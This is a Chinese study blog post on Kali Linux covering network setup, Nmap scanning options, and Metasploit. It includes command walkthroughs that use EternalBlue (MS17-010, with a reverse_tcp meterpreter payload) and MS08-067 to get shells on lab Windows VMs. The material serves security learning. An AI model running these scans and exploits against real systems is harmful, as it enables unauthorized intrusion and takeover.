kali的学习

网络配置

1.kali的网络设置

首先我们了解kali的网络设置

DHCP:动态主机配置协议 是一个局域网的协议 使用UDP 协议工作

静态IP:用于大部分的中小型网络 通过网络管理员手动分配IP

原理进程

/etc  系统大部分服务启动过程都要访问该目录 

我们直接去看看

/ect/network/interfaces
这里就可以配置两个

1.DHCP:

auto eth0
iface eth0 inet dhcp //配置eth0使用DHCP协议


2.静态ip

auto eth0
iface eth0 inet static //配置eth0使用默认的静态地址
address 192.168.0.90 //设置eth0的IP地址,根据需求配置
gateway 192.168.0.1 //配置当前主机的默认网关,根据需求配置
netmask 255.255.255.0 //配置eth0的子网掩码,根据需求配置

然后就是设置 DNS

resolv.conf中 可以配置3 个 nameserver 

一旦前面失效 就会尝试下一个 
vi /etc/resolv.conf #进行DNS编辑

    nameserver 114.114.114.114 //国内移动、电信和联通通用的DNS

    nameserver 8.8.8.8 //是谷歌的IP地址

    nameserver 223.5.5.5 //是阿里云的IP地址

    nameserver 180.76.76.87 //是百度的IP地址

保存,退出

然后进行重启网络设置

sudo service networking restart

2.kali的三种模式

NAT 网络地址转移模式

Bridged 桥接模式 

Host-Only 主机模式

NAT

NAT 就是虚拟系统会通过 宿主机 来访问外网

相当于主机存在两个网卡

一个是虚拟网卡 一个宿主机的网卡

当虚拟网卡想要访问外网的时候 就必须通过宿主机的IP地址

从外面看 就是宿主机的IP 是完全看不到虚拟环境的内部网络

这个时候 

虚拟机和宿主机和虚拟交换机形成一个网段

宿主机和真实交换机形成一个网段
优点

不需要自己手动分配ip

只要宿主能访问即可

kali的学习_第1张图片

Bridged

桥接模式就是 虚拟网卡和物理网卡通过 VMnet0虚拟交换机进行桥接


这个时候 VMnet0就相当于现实的交换机

他可以访问这个网络内的所有主机

但是需要手动设置 ip 子网掩码

这个模式中 可以互相ping

kali的学习_第2张图片

 Host-Only

在Host-Only模式下,虚拟网络是一个全封闭的网络,它唯一能够访问的就是主机。

其实Host-Only网络和NAT网络很相似,不同的地方就是Host-Only网络没有NAT服务,所以虚拟网络不能连接到Internet。主机和虚拟机之间的通信是通过VMware Network Adepter VMnet1虚拟网卡来实现的。

kali的网络设置及三种网络模式_kali配置网络_木_木的博客-CSDN博客

NMAP

ctf工具Nmap使用教程图文教程(超详细)_ctf 端口扫描_程序员小麦的博客-CSDN博客

kali的学习_第3张图片

一.端口扫描

扫描主机开发的端口 与服务(默认是1000个端口)

nmap [ip]

kali的学习_第4张图片

这里将我本机的端口扫描出来了 并且显示了 每个端口的服务是什么

1.指定端口

其中我们可以对主机进行指定端口扫描 通过 -p指令

nmap 192.168.3.25 -p 80  单个

nmap 192.168.3.25 -p 1-80   范围

nmap 192.168.3.25 -p 80,3389,22,21  枚举

nmap 192.168.3.25 -p 1-65535   范围

nmap 192.168.3.25 -p-   相当于 1-65536

kali的学习_第5张图片

 2.指定扫描方式

-sT 使用三次完整的握手来判断存活 否则失败
-sS  通过两次握手来 如果对方传回确认帧 那么就存活

二.主机存活

可以扫描哪里主机存活

-sP 不扫描端口 只扫描主机

其实实质上就是 ping 只要ping通 就说明存活
nmap 192.168.3.0/24 -sP

kali的学习_第6张图片

上面显示了 256个IP中存在3个活着的 主机

三.服务扫描

在扫描端口的时候 会默认显示端口存在的服务

如果要查看服务的具体版本 就可以使用 -sV
nmap 192.168.3.25 -p 80 -sV

kali的学习_第7张图片

发现是 apache 的服务器

四.系统识别

-O 可以识别端口的主机的系统

nmap 192.168.3.25 -p 80 -O

kali的学习_第8张图片

 发现这里就显示 run在 win10上

五.探测防火墙

我们可以通过 nmap 来探测防火墙的存在

nmap 192.168.3.25  -sF

组合命令

T4可以指定时序 0-5 级别越高 速度越快 越容易被防火墙ban


nmap -F -T4 -P0

-F 100个端口  -P0 无ping扫描

kali的学习_第9张图片

nmap -sC -sV  -Pn  192.168.3.25

-sC 通过 nmap 脚本探测

-Pn 进制ping 后扫描 

-sV  版本探测

 kali的学习_第10张图片

nmap -A -v -T4 +IP

kali的学习_第11张图片

 MSF

MATESPLOIT(MSF)是个免费开源的 攻击框架

附带了很多已知 知名的漏洞 

在刚刚MSF出现的时候 只要会使用 MSF 就可以对未打补丁或刚刚打补丁的进行攻击

在kali中自带了 MSF

所以我们只需要启动即可

msfconsole

kali的学习_第12张图片

 这里对MSF的几个模块进行解释

1、Auxiliary(辅助模块)

收集信息 提供大量辅助的一个模块

2、Exploits(攻击模块)

通过调动漏洞 进行攻击


3、Payload(攻击载荷模块)


攻击成功后促使靶机运行的一段植入代码

4、Post (后渗透攻击模块)


收集更多信息或进一步访问被利用的目标系统


5、Encoders(编码模块)


就是通过 编码绕过

首先来了解一下基础的用法

【工具使用】——Metasploit(MSF)使用详解(超详细)_剑客 getshell的博客-CSDN博客

msfconsole

进入 msf框架

search  ms17_010

通过 search 命令查找漏洞

use exploit/windows/smb/ms17_010_eternalblue

通过 use 进入模块

info 

查看设置

set payload windows/x64/meterpreter/reverse_tcp  

设置 攻击模块为 这个漏洞

options

查看参数

set  RHOST  192.168.100.158   

设置攻击对象

run

进行攻击

大致就差不多是这样

我们复现一下 永恒之蓝 ms17-010

首先准备win7 的 IP  地址 我这里是 192.168.222.133

我们先通过 nmap 查看 一个网段存活的主机

nmap -sS 192.168.222.0/24

kali的学习_第13张图片

发现存在 5 个 其中能发现我们要攻击的主机ip

133

kali的学习_第14张图片

 那么我们就看看 他是什么系统的

nmap -O 192.168.222.133

 然后使用 nmap的脚本查看存在什么漏洞

nmap --script=vuln 192.168.222.133

kali的学习_第15张图片

 发现主角了 ms17-010 那么我们就请出MSF

msfconsole
search ms17-010

kali的学习_第16张图片

 这里exp的都是漏洞利用模块的 auxiliary是辅助探测模块 所以我们先通过 辅助探测 看看存不存在漏洞

这里直接 use 3

 然后看看info

kali的学习_第17张图片

 发现了 这里rhosts没有设置 而且是必须设置的选项

那我们就设置 为 攻击目标的ip范围

注:RHOSTS 参数是要探测主机的ip或ip范围,我们探测一个ip范围内的主机是否存在漏洞
set rhosts 192.168.222.100-192.168.222.190

exploit

kali的学习_第18张图片

扫到了

那我们直接通过

Exploit漏洞利用模块 对目标进行攻击
set rhosts 192.168.222.133

然后run 即可

kali的学习_第19张图片

 

这样就成功拿到shell了

kali的学习_第20张图片

 接下来复现另一个漏洞

MS08-067

ms08-067漏洞复现_ms08-067复现_老司机开代码的博客-CSDN博客

MicrosoftWindows是美国微软(Microsoft)公司发布的一系列操作系统。Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,以SYSTEM权限执行任意指令。对于Windows2000、XP和Server2003,无需认证便可以利用这个漏洞;对于WindowsVista和Server2008,可能需要进行认证。

首先需要一个 xp的系统 一样这里的ip为137

那我们直接开始

nmap -sS 192.168.222.0/24

kali的学习_第21张图片

我们看看什么系统

nmap -O 192.168.222.137

kali的学习_第22张图片

发现也无法确定 那我们直接就 通过脚本扫

nmap --script=vuln 192.168.222.137

kali的学习_第23张图片

 扫到了 并且也存在永恒之蓝

那我们直接启动  msf

msfconsole

search MS08-067

kali的学习_第24张图片

use 0

options

kali的学习_第25张图片

set RHOSTS 192.168.222.137
show targets

kali的学习_第26张图片

set target 34

run

kali的学习_第27张图片

成功调用了cmd

你可能感兴趣的:(WEB,kali)